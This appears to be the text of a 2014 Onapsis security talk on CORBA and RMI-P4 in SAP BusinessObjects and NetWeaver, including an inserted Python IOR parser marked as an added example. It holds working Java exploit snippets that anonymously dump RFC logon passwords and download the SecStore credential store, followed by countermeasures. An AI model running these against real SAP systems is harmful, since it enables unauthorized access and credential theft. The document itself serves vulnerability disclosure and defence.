CONFIDENTIAL © 2014 Onapsis, Inc. All Rights Reserved. 03/12/2014
Dissecting and Attacking RMI Frameworks
Nahuel D. Sánchez | Sergio
[email protected] | [email protected]
@serj_ab
Disclaimer
This presentation contains references to the products of SAP AG. SAP, R/3, xApps, xApp, SAP NetWeaver, Duet, PartnerEdge, ByDesign, SAP Business ByDesign, and other SAP products and services mentioned herein are trademarks or registered trademarks of SAP AG in Germany and in several other countries all over the world.
Business Objects and the Business Objects logo, BusinessObjects, Crystal Reports, Crystal Decisions, Web Intelligence, Xcelsius and other Business Objects products and services mentioned herein are trademarks or registered trademarks of Business Objects in the United States and/or other countries.
SAP AG is neither the author nor the publisher of this publication and is not responsible for its content, and SAP Group shall not be liable for errors or omissions with respect to the materials.
Onapsis Inc. Overview
Transforming how organizations protect the applications that manage their business-critical processes and information.
Founded: 2009
Locations: Buenos Aires, AR | Boston, MA | Berlin, DE | Lyon, FR
Technology: Onapsis X1 (Auditor Solution); Onapsis Security Platform (Enterprise Solution) (PCT patent-pending)
Pricing: Subscription-based (Enterprise, Audit On-Demand and MSP)
Research: 130+ SAP security advisories and presentations published
Who are We?
Sergio: SAP Security Specialist
Nahuel: Security Researcher
• Reported more than 25 vulnerabilities in different SAP Products
• Onapsis Blog contributors
• Authors of Onapsis SAP Security In-Depth Publications
• Speakers/Trainers at Ekoparty, Hubcon, SANS
Agenda
Introduction
• What is RMI?
• RMI Implementations
• RMI vs Web Services
CORBA implementation
• Basic concepts (IDLs, IORs)
• CORBA and SAP Business Objects
• Attacks
P4 implementation
• Basic Concepts
• P4 and SAP NetWeaver
Conclusions
Introduction | What is RMI?
RMI stands for Remote Method Invocation
Conceptually similar to RPC (Remote Procedure Call)
Allows invoking methods on objects running on remote machines
RMI vs Web Services
Same idea, different implementation
Both allow users to execute actions in the server
RMI
• 15-20 years old
• Complex (objects management, garbage collection)
• Provide interfaces for legacy systems
• Stateful
• A more profitable attack target
Web Services
• 15-20 years old
• Stateless
• Aware of RMI limitations/problems when developed
Introduction | What is RMI? Cont’d
Products using RMI-based protocols
• JBoss Application Server (Java-RMI)
• Oracle WebLogic Server (WebLogic-RMI)
• IBM Lotus Domino (Java-RMI)
• Apache Axis2 (CORBA)
In this talk
• SAP Business Objects (CORBA)
• SAP NetWeaver Java (RMI-P4)
So…What is SAP?
SAP (Systems, Applications and Products in Data Processing) is a German company devoted to the development of business solutions.
Founded in 1972.
Almost 67,000 employees.*
More than 253,000 customers.*
Presence in most countries.
Third biggest independent software vendor (ISV).
* http://www.sap.com/corporate-en/about/our-company/index.html
* http://en.wikipedia.org/wiki/SAP_SE
SAP Solutions
Enterprise Solutions
SAP CRM (Customer Relationship Management).
SAP ERP (Enterprise Resource Planning).
SAP SCM (Supply Chain Management).
SAP SRM (Supplier Relationship Management).
Business Solutions
SAP GRC (Governance, Risk and Compliance).
SAP Portal
SAP Solution Manager
SAP Business Objects
CORBA implementation
Common Object Request Broker Architecture
Connect different software components (local/remote)
Language agnostic
Object oriented
Provides “Objectization” to non-object languages like C or COBOL
http://pubs.opengroup.org-onlinepubs-9279299-apdxa.htm
Common Object Request Broker Architecture
http://www.cs.wustl.edu/schmidt-corba-overview.html
CORBA – Locating objects
CORBA Naming Service
• Implemented as an “Object Service”
• Provides a way to locate other objects
CorbaLoc & CorbaName URLs
• Similar to “common” URLs
    corbaloc::target:1234/MyObjectKey
    corbaname::target:1234/NameService#Hello/World
CORBA – Locating objects
Interoperable Object References (IOR)
• Object key
• IP Address
• Listening port
• Repository ID
IOR:010000003500000049444c3a696d672e73656167617465736f6674776172652e636f6d2f
Parsed IOR:
_IIOP_ParseCDR: byte order LittleEndian, repository id<IDL:img.seagatesoftware.com/ImplServ/OSCAFactory:3.1>, 1 profile
_IIOP_ParseCDR: profile 1 is 70 bytes, tag 0 (INTERNET), LittleEndian byte order
(iiop.c:parse_IIOP_Profile): bo=LittleEndian, version=1.1, hostname=BO4WV,port=1056, object_key=<....`hjR........>
object key is <#00#00#00#00`hjR#88#C5#0C#00#02#00#00#00>;
no trustworthy most-specific-type info; unrecognized ORB type;
reachable with IIOP 1.1 at host "BO4WV", port 1056
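As an added example (not from the slides or from any Onapsis tool), a small Python parser for stringified IORs: it walks the standard CDR layout (byte-order flag, size-aligned primitives, length-prefixed NUL-terminated strings, the IIOP profile as a nested encapsulation) and returns the fields the parse output above shows, so an analyst can see exactly what a CMS discloses about itself on first contact. The sample IOR is constructed to carry the values from that output, since the IOR on the slide is truncated; the writer class exists only to build it, and tagged components after the object key are not decoded.

```python
import struct

class CDRReader:
    """One CDR encapsulation: octet 0 is the byte-order flag (1 = little-endian)."""
    def __init__(self, data):
        self.data, self.pos, self.end = data, 1, "<" if data[0] == 1 else ">"
    def unpack(self, fmt):  # primitives are aligned to their own size, counted from offset 0
        size = struct.calcsize(fmt)
        self.pos += (-self.pos) % size
        (value,) = struct.unpack_from(self.end + fmt, self.data, self.pos)
        self.pos += size
        return value
    def octets(self):  # sequence<octet>: ulong length, then the raw bytes
        n = self.unpack("I"); self.pos += n
        return self.data[self.pos - n:self.pos]
    def string(self):  # CDR string: length-prefixed (NUL included) and NUL-terminated
        return self.octets()[:-1].decode("latin-1")

def parse_ior(ior):  # -> (repository id, [IIOP profiles]) from a stringified "IOR:<hex>" reference
    r = CDRReader(bytes.fromhex(ior[len("IOR:"):]))
    type_id, profiles = r.string(), []
    for _ in range(r.unpack("I")):
        tag, body = r.unpack("I"), r.octets()
        if tag == 0:  # TAG_INTERNET_IOP; the profile body is a nested encapsulation
            p = CDRReader(body)
            major, minor = p.unpack("B"), p.unpack("B")
            host, port, key = p.string(), p.unpack("H"), p.octets()  # tagged components (1.1+) not decoded
            profiles.append({"version": f"{major}.{minor}", "host": host, "port": port, "object_key": key})
    return type_id, profiles

class CDRWriter:
    """Little-endian encapsulation builder (mirror of CDRReader); only used to build the sample."""
    def __init__(self):
        self.buf = bytearray(b"\x01")
    def pack(self, fmt, value):
        self.buf += b"\x00" * ((-len(self.buf)) % struct.calcsize(fmt)) + struct.pack("<" + fmt, value)
    def octets(self, data):
        self.pack("I", len(data)); self.buf += data
    def string(self, text):
        self.octets(text.encode("latin-1") + b"\x00")

def build_ior(type_id, host, port, key):  # one IIOP 1.1 profile with an empty tagged-component list
    prof, ior = CDRWriter(), CDRWriter()
    prof.pack("B", 1); prof.pack("B", 1); prof.string(host); prof.pack("H", port); prof.octets(key); prof.pack("I", 0)
    ior.string(type_id); ior.pack("I", 1); ior.pack("I", 0); ior.octets(bytes(prof.buf))
    return "IOR:" + bytes(ior.buf).hex()

SAMPLE_IOR = build_ior("IDL:img.seagatesoftware.com/ImplServ/OSCAFactory:3.1", "BO4WV", 1056,
    bytes.fromhex("00000000" "60686a52" "88c50c00" "02000000"))  # constructed sample: values from the slide's parse output, not its truncated IOR
```

Because the hex prefix of a real IOR is just the byte-order flag and the repository id, `SAMPLE_IOR` starts with the same bytes as the truncated IOR on the slide.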
CORBA – IDLs
Interface Definition Language (IDL)
• Define objects
• Shared by the client and the server
• Language specific compilation
Example IDL interface
    // fortune.idl
    module Fortune {
        interface CookieServer {
            string get_cookie();
        };
    };
CORBA & SAP Business Objects
Used for inter-process communication only
SAP doesn’t provide IDLs for objects
Options we have:
• Reverse engineering IDLs from classes (PITA)
• Import the Java JAR files and use them directly
Files required:
• corbaidl.jar
• ebus405.jar
CORBA & SAP Business Objects
The BOE Central Management Server (CMS)
• Platform’s brain
• Keeps track of all enabled services/servers
Name server port
• Port TCP 6400 (default)
• Applications use this port for first contact
Request port
• Dynamic port by default
• Used by all applications after first request
What do we need to attack a BO implementation?
CMS IP
CMS static port
CMS IOR
SRVs’ IORs
Obtaining the CMS IOR
Obtained through traffic analysis
Client sends the string “aps” to the CMS static port (6400)
CMS returns its IOR
Needed for further attacks
RMI-P4
SAP proprietary protocol
Present in every SAP NetWeaver Application Server Java
Combines features of Java RMI and CORBA
Listens on port 5XX04 (5XX06 for SSL)
Can be tunneled through HTTP!!! P4HTTP (5XX05)
Enables client-server communication:
• Locating remote objects
• Communication with remote objects
• Loading classes remotely
Examples:
• SAP Enterprise Portal
• SAP Solution Manager
https://help.sap.com/saphelp_nwce711/helpdata/en/48/295738a14558d8e10000000a421937/content.htm
RMI-P4
Where specifically is RMI-P4 used?
• Real example: JMX (Java Management Extensions)
  o Allows building manageable distributed Java Apps
    - start/stop/restart
    - changing configuration
    - backup/import settings/so on…
  o Client-server architecture based on: RMI-P4
In fact... SAP NetWeaver Application Server Java is based on a JMX architecture
http://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=73160
RMI-P4
Basic implementation
• Server and Client-side (the interface is shared):
    public interface HelloWorld extends java.rmi.Remote {
        public void hello() throws java.rmi.RemoteException;
    }
• Server-side:
    public class HelloWorldImpl implements HelloWorld {
        public void hello() {
            System.out.println("Hello World");
        }
    }
RMI-P4 does not use IDLs (as CORBA does).
Interfaces are already known by the client since they are defined on both sides.
RMI-P4
How to find and invoke a remote object?
JNDI (Java Naming and Directory Interface)
• Standard Java API
• Allows applications to access multiple naming and directory services via a common interface
Two very interesting features:
• Naming Service
• Directory Service
https://help.sap.com/saphelp_nwce711/helpdata/en/99/e8b84172133131e10000000a155106/content.htm
RMI-P4
    import java.util.Properties;
    import javax.naming.Context;
    import javax.naming.InitialContext;

    public class BankClient {
        public static void main(String[] args) {
            try {
                Properties p = new Properties();
                // Specify the type of the InitialContext factory.
                p.put(Context.INITIAL_CONTEXT_FACTORY,
                      "com.sap.engine.services.jndi.InitialContextFactoryImpl");
                // Specify the URL.
                p.put(Context.PROVIDER_URL, "p4://" + args[0] + ":" + args[1]);
                p.put(Context.SECURITY_PRINCIPAL, args[2]);   // Specify the user.
                p.put(Context.SECURITY_CREDENTIALS, args[3]); // Specify the password.
                // Connect to the server by the InitialContext.
                Context initialContext = new InitialContext(p);
                Account account = (Account) initialContext.lookup("Bank");
                // Invoke methods remotely.
                account.deposit(100);
                System.out.println("Balance:" + account.getBalance());
                System.out.println("Try to draw...");
                account.draw(50);
                System.out.println("Balance:" + account.getBalance());
            } catch (Exception ex) {
                ex.printStackTrace();
            }
        }
    }
RMI-P4
    p.put(Context.SECURITY_PRINCIPAL, args[2]);   // Specify the user.
    p.put(Context.SECURITY_CREDENTIALS, args[3]); // Specify the password.
What happens if we do not specify this?
The user is logged in as GUEST and, as every application defines its own security requirements, it only takes one missing authorization check to get full access!
https://help.sap.com/saphelp_nw73ehp1/helpdata/en/e9/88435b5d84b24e8c62048ff36bd600/content.htm
http://help.sap-ag.de/saphelp_nw73/helpdata/de/4a/eac9a0cd2823aee10000000a42189c/frameset.htm
RMI-P4
Attack 1: Authentication Credentials Disclosure
Example of application of this attack: System Landscape Directory
• Central information repository
• Consolidates all systems, hardware and software components
• Allows administration of systems
  o Installation
  o Updates and patches
  o Interfaces
• Mandatory in every SAP implementation
http://help.sap.com/saphelp_nw70/helpdata/en/21/84570b3ae14e77b3047c82218974b9/content.htm
RMI-P4
Attack 1: Authentication Credentials Disclosure
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY,
          "com.sap.engine.services.jndi.InitialContextFactoryImpl");
    p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);
    Context initialContext = new InitialContext(p);
    RFCRuntimeInterface_Stub o =
        (RFCRuntimeInterface_Stub) initialContext.lookup("rfcengine");
    BundleConfiguration[] bc = o.getConfigurations();
    for (int i = 0; i < bc.length; i++) {
        String data = bc[i].getLogonClient() + ":" + bc[i].getLogonUser() + ":" + bc[i].getLogonPassword();
        System.out.println(data);
    }
RMI-P4
Attack 2: Anonymous Remote File Read/Write
Targeted service: File Transfer Service API
• SAP Ready-to-Use Service
• Allows upload/download of files to/from the AppServer
• Most common use case: deployment of Java applications
• Main problem: lack of authorization checks
  o Consequence: accessible by the GUEST user!
http://help.sap.com/saphelp_oil472/helpdata/en/48/1d813ecfd43546e10000000a114084/content.htm
One more step…Get the Secure Store:
• Secure Store container (SecStore.properties)
• Secure Store key (SecStore.key)
• Decrypt! (3DES)
RMI-P4
Attack 2: Anonymous Remote File Read/Write
    Properties p = new Properties();
    p.put(Context.INITIAL_CONTEXT_FACTORY,
          "com.sap.engine.services.jndi.InitialContextFactoryImpl");
    p.put(Context.PROVIDER_URL, "p4://" + host + ":" + port);
    Context initialContext = new InitialContext(p);
    FileTransfer_Stub o = (FileTransfer_Stub) initialContext.lookup("file");
    String source = "C:\\tmp\\SecStore.properties";
    String dest = "/usr/sap/<SID>/SYS/global/security/data/SecStore.properties";
    com.sap.engine.services.file.RemoteFile f = o.createRemoteFile(source, dest);
    f.download();
RMI-P4
Attack 2: Anonymous Remote File Read/Write
Protection / Countermeasure
Secure the P4 service (5XX04, 5XX05, 5XX06)
Apply all SAP Security Notes. Keep the systems up-to-date.
Implement SAP Security Notes 1682613 and 1819822.
Check the “References” slide for more information!
Questions?